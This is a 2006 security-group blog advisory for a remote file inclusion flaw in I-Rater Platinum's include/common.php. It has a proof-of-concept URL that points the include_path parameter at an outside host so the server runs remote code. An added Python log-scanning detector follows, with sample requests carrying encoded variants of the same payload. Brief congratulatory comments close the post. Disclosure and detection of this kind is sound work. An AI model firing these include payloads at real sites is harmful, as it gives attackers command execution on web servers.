by r0t,der4444,cembo,VietMafia

Thursday, April 20, 2006

I-Rater Platinum - Remote File Inclusion Vuln

=================================
developer's site: www.i-rater.com
script: I-Rater Platinum
risk: critical
status: unpatched
discovered by: VietMafia
=================================

Vuln. Description:

This flaw is due to an input validation error in "include/common.php" (lines 3 and 4), which does not properly validate the "include_path" variable. Remote attackers can include malicious scripts and execute arbitrary commands with the privileges of the web server.

PoC:

http://[target]/[path]/include/common.php?include_path=http://unsecured-systems.com/forum/
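
A way to hunt for this request pattern in web server access logs, as an added example that is not part of the original advisory. It flags any request whose "include_path" query parameter decodes to a URL scheme rather than a local path. The combined log format, the sample lines, the hosts and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Apr/2006:07:50:01 +0000] "GET /rater/include/common.php?include_path=http://files.example.test/forum/ HTTP/1.1" 200 512
203.0.113.5 - - [20/Apr/2006:07:50:09 +0000] "GET /rater/include/common.php?include_path=hTTp%3A%2F%2Ffiles.example.test%2F HTTP/1.1" 200 498
198.51.100.7 - - [20/Apr/2006:07:51:30 +0000] "GET /rater/index.php?page=2 HTTP/1.1" 200 8120
198.51.100.9 - - [20/Apr/2006:07:52:44 +0000] "GET /rater/include/common.php?include_path=ftp%253A%252F%252Ffiles.example.test%252F HTTP/1.1" 200 0
198.51.100.7 - - [20/Apr/2006:07:53:02 +0000] "GET /rater/view.php?include_path=include/ HTTP/1.1" 200 4410
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A URL scheme prefix such as http:, ftp:, php: or data: (two or more
# characters, so a Windows drive letter like C: is not flagged).
REMOTE_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]+:', re.IGNORECASE)
PARAM = "include_path"  # parameter named in the advisory

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so %252F and %2F both become '/'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_remote_include(request_target):
    """True if the include_path query parameter carries a URL scheme."""
    query = urlsplit(request_target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # Conservative: double-encoded values are decoded and checked too.
        if name.lower() == PARAM and REMOTE_RE.match(fully_decode(value)):
            return True
    return False

def suspicious_lines(log_text):
    """Return (line_number, client_ip) for each request that trips the check."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if match and is_remote_include(match.group(1)):
            hits.append((number, line.split()[0]))
    return hits

if __name__ == "__main__":
    for number, client in suspicious_lines(SAMPLE_LOG):
        print(f"line {number}: remote include_path from {client}")
```

The check matches on the parameter name rather than the script path, so it also covers other scripts that accept "include_path"; only query strings are inspected, not POST bodies.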

4 Comments:

Blogger r0t told...

nice work bro! keep it coming!

7:50 AM

 
Blogger VietMafia told...

thanks r0t,

it can't be compared to your works!!!!

7:55 AM

 
Blogger r0t told...

he he.. of course you can...:)

10:11 AM

 
Blogger cembo told...

Good work!

1:35 PM

 


 
Copyright (c) 2006 Pridels Sec Crew